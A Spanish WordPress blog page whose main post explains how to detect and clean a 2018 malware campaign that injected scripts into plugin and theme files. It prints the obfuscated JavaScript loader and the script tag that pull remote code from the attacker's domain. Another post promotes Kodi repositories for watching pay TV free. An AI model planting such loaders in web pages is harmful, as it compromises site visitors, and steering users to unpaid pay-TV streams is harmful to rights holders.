tityx.com, bemyfreeman.tk, uustoughtonma.org, cdnallyouwantonline.innocraft.cloud infectan WordPress, ¿Como Solucionarlo?

Hola, gracias por visitar de nuevo mi blog, actualmente varios sitios de wordpress han presentado una campaña de infeccion masiva que ha afectado a dos dominios con los que trabajo, han sido dos debido a que tengo una cuenta de hosting compartido para ese cliente asi que a pesar de poder alojar multiples dominios y tener ilimitadas las bases de datos tengo alojadas todas las paginas en el mismo servidor, hace unos dias mi sitio estuvo normal, pero luego la infeccion volvió, cambiaron sus dominios y me todo volver a hacerle una auditoria completa a el sitio infectado y a todos los archivos del hosting en general debido a que el script que causa la infeccion esta programado para replicarse asi mismo.

Este post lo escribo como una actualizacion a mi post anterior Problemas en WordPress con utroro.com y horselorse5151 el ataque ahora tiene vectores distintos y por medio de esta nueva entrada voy a explicar como limpiarlo e intentar eliminar todos los Backdoors.

Hacer análisis de los archivos infectados

Existen paginas de internet para revisar cuales son los archivos infectados de nuestro sitio web, recomiendo usar el SiteCheck de Sucuri, aunque no siempre funciona, en mi caso no me detecto ningún archivo malicioso.

Supongo que es porque todavía los dominios donde están ubicados los archivos maliciosos no han sido añadidos a las listas negras, pero obviamente la infección esta latente en las carpetas de nuestro servidor.

Ahora tenemos dos opciones, revisar manualmente los archivos o usar algún plugin que lo haga por nosotros. igual voy a profundizar lo suficiente para explicar ambos métodos.

Forma Automática usando Plugins

Lo primero es buscar y descargar un plugin de seguridad llamado Wordfence al instalarlo realizaremos un primer escaneo de la pagina web, así detectaremos cuales son los archivos infectados, que son en su mayoría todos los que contengan la palabra Jquery, head y Header en su nombre de archivo.

En Scan vamos ahora a seleccionar la opción que dice START A NEW SCAN

Cuando termine la pagina de hacer el escaneo nos va a mostrar una lista con las infecciones encontradas en nuestro sitio web con un información detallada.

si damos en VIEW DIFFERENCES, tenemos acceso inmediato a un detalle del archivo original y el archivo modificado por el script malicioso.

Ahora para hacer la desinfección tenemos que presionar sobre el boton que dice REPAIR, con esto el archivo hará la recuperación de el código original contenido en el archivo real.

luego nos arrojara un mensaje que dice “Success restoring file“.  No recomiendo usar la opcion que dice “REPAIR ALL REPAIRABLE FILES” porque a veces no permite borrar los archivos completos a la vez. luego de que los borres uno por uno debemos seguir con la desinfección, si tienes otros sitios en tu hosting que trabajen con wordpress también los debes desinfectar todos. si tienes varias cuentas es un proceso largo.

Luego de limpiar y eliminar las alertas tenemos que seguir revisando la pagina web, vamos a comenzar desde el directorio de instalación de wordpress, usando el Cpanel podemos ver fechas de la ultima modificación de los archivos, entramos a la carpeta wp-content yo personalmente voy a borrar todas las carpetas menos languages, plugins, themes y la carpeta uploads, el archivo index.php tampoco lo deben borrar.

Despues vamos a revisar las carpetas restantes, comenzando por la de languajes, todos son archivos en formato .mo o .po que no ejecutan codigo en el navegador, ademas la fecha ultima de modificacion no es reciente (teniendo en cuenta el vector de la infeccion, hoy es 3 de septiembre de 2018 han pasado unos 2 días desde que detecte nuevamente el ataque)

Ahora estoy ubicado en la carpeta Plugins, yo manejo los siguientes plugins en la pagina web mostrada en la infeccion: contact-form-7, hover-video-preview, hover-video-preview, js_composer(visual composer), redux-framework, thumbnail-crop-position, wordfence,  wordpress-seo y wp-gdpr-compliance.

Entrando en la primera carpeta-contact form revisaba si el plugin se habia infectado, para esto abri el archivo wp-contact-form-7.php pero se veia normal, al abrir la carpeta includes/js/jquery-ui/themes/smoothness/ y abri el archivo jquery-ui.css con el editor del cpanel tenia código malicioso en la cabecera, pese a ser una hoja de estilos, es mejor evitar todo tipo de intrusion, asi que lo mejor que puedes hacer una vez alcanzado este punto es borrar los plugins y volverlos a activar, eso si no has hecho una copia de seguridad.

Esa linea de codigo tiene lo siguiente:

var d3 = document.createElement('script'); d3.type = 'text/javascript'; d3.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 46, 117, 117, 115, 116, 111, 117, 103, 104, 116, 111, 110, 109, 97, 46, 111, 114, 103, 47, 115, 116, 97, 116, 115, 46, 106, 115, 63, 102, 61, 52); var scripts = document.getElementsByTagName('script');
var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == d3.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(d3);}

Este archivo aparece repetido en todos los archivos que contengan la palabra “Jquery” ademas de buscar y sobrescribir también los archivos con nombre “header” o “head”

Para poder eliminar el archivo tenemos que volver a subir todos los plugins, porque los archivos estan corruptos.

Es posible que la plantilla tambien este mal, asi que toca subir de nuevo la plantilla a la pagina web.

siempre es bueno al usar el administrador de archivos organizar los resultados por Last Modified asi se pueden ver ma facil los archivos modificados de forma reciente, en Header.php adentro de la carpeta Themes, yo en esa pagina uso el theme Unbound.

En la cabecera vemos varias lineas de codigo inyectadas. todas con el mismo codigo malicioso.

La maldita linea de codigo es esta:

<script type='text/javascript' src='https://stat.uustoughtonma.org/stats.js?f=2'></script>

esta por todas partes, asi que tenemos que borrarla las veces que aparece.

Ya manualmente toca subir uno a uno los plugins nuevamente, y tambien toca volver a subir la plantilla UNBOUND, al haberla comprado tenemos acceso a bajarla en su ultima version, yo recomiendo este metodo por eso

te recuerdo que si estas interesado en recibir mas información al correo puedes suscribirte aqui: 

Publicado en Guias, Seguridad, Wordpress | Etiquetado , , , | Deja un comentario

Como Recuperar la Clave de WordPress via PhpMyAdmin

Hola, es bastante común que por error, descuido o por un ataque de cyber delincuentes perdamos acceso a nuestro wordpress, es un caso muy común, en mi caso no se puede ver que tipo de error es porque he modificado el archivo functions de mi pagina para eliminar la linea de código que indica el tipo de error, esto es para mejorar la seguridad.

Sigue leyendo

Publicado en Wordpress | Etiquetado , , | Deja un comentario

Problemas en WordPress con utroro.com y horselorse5151

Hola buenas tardes, hace ya varios días algunos sitios web de mis clientes fueron infectados por una especie de código malicioso que se encarga de ejecutar cadenas de código de forma no autorizada en nuestro servidor, este post lo escribo porque me gustaría explicar un poco el proceso que yo  realice para poder recuperar los sitios web.

Lo primero es saber si estas infectado, muchas veces aparece una ventana de “verificación humano-maquina” yo voy a mostrar el proceso de la infección en uno de lo sitios web que comentaba: cam-link.com Sigue leyendo

Publicado en Uncategorized | 5 comentarios

Ver Television de Pago Gratis gracias a Kodi

Hola, bueno espero que este post les sea de utilidad, quiero hablarles sobre kodi, una aplicacion que nos va a servir para poder ver tv usando la internet, se recomienda una conexion de 5 mb minimo ya que Kodi puede llegar a reproducir peliculas en 720p o 1080p.

 

Vamos a hablar un poco de Kodi, antes solia llamarse XBMC o (xbox media center) por sus siglas en ingles, pero con el tiempo paso de ser una aplicacion solo para xbox a ser multi-plataforma.

Como Instalar Kodi

Para instalar Kodi necesitamos visitar su pagina oficial: https://kodi.tv/download

Una vez en el sitio vamos a descargar la aplicacion ya sea para el pc, o para un android, si usan el tv box la pueden tambien encontrar en la play store haciendo click aqui: https://play.google.com/store/apps/details?id=org.xbmc.kodi&hl=es_419

 

Despues de tenerla instalada vamos a comenzar a instalar algo llamados “repositorios” o de forma abreviada “repos”, estos son listas de enlaces o funciones adiconales para añadirle al Kodi, yo he ido recopilando los mejores repos que he visto en el siguiente link que esta alojado en mi servidor, si desean usar alguno pueden usar libremente el siguiente enlace:

https://dismal.site/kodi/

 

Contiene varios repositorios y listas de canales enfocados mas que todo en ver contenido en español latino y subtitulado al español.

 

Como Cambiar el idioma en Kodi

Luego de tener Kodi instalado vamos a ir su panel de control, y cambiaremos el Idioma a español y ademas vamos a añadir la url de los repositorios.

Luego nos vamos a Interface Settings desde aqui vamos a cambiar el idioma a español para que sea mas comodo moverse y entender Kodi, claro este paso solo es necesario para aquellos que no son muy buenos con el ingles, yo en lo personal lo tengo en ingles.

Luego de estar aqui procedemos a cambiar el idioma de ingles a español y esperamos a que Kodi descargue e instale el idioma, luego de eso nos va a quedar todo en español, ahora si podemos seguir con la instalacion de los repositorios.

Como Instalar un Repositorio de Kodi

Para instalar los repositorios primero debemos tener añadida la url donde estan alojados los archivos, yo les comente que tenia subidos varios en este link: https://dismal.site/kodi/ pues vamos a usarlo ahora, lo primero es de nuevo ir a la configuracion de kodi luego seleccionamos el explorador de archivos

Luego vamos a presionar el lado izquierdo donde dice “Añadir Fuente” y aqui vamos a pegar la url anteriormente brindada, siguiendo la imagen de mas abajo como indicacion.

Ponemos ahora el cursor sobre el primer campo que aparece y aqui vamos a escribir la Url.

 

Asi es como deben escribirlo, luego le dan donde dice “OK”.

L

Debe añadirse la url exactamente como aparece arriba, luego vamos a ponerle el nombre de “Repositorio Dismal” y presionamos  “OK”

Ya con esto quedaria guardado el repo de dismal, y ahora podemos comenzar a instalar los repositorios.

Instalar los Plugins desde el Repositorio

 

Bueno ya que tenemos instalado kodi y creado el repositorio en el administrador de archivos procedemos a instalar cada uno de los plugins de video y repositorios adicionales que estan en el link, asi que lo primero es abrir Kodi e ir a la parte que dice add-ons luego buscamos un icono que tiene forma de una caja.

Luego seleccionamos la opcion que dice, instalar desde un archivo ZIP

Despues de esto nos saldra una ventana donde vamos a elegir nuestro repo de Dismal luego de esto vamos a ir añadiendo los repositorios que permitiran usar Kodi para ver Tv, peliculas y Series.

Dan doble click en Repositorio Dismal o el nombre que le pusieron, luego nos arroja dos carpetas, una que se llama REPO, la seleccionamos y adentro encontraremos la lista de repositorios:

Ahora voy a colocar un pequeño video demostrando como instalar un repositorio completo paso a paso, lo siento por el audio, no edite el video salio asi a la primera:

Publicado en Uncategorized | Etiquetado , , , , | Deja un comentario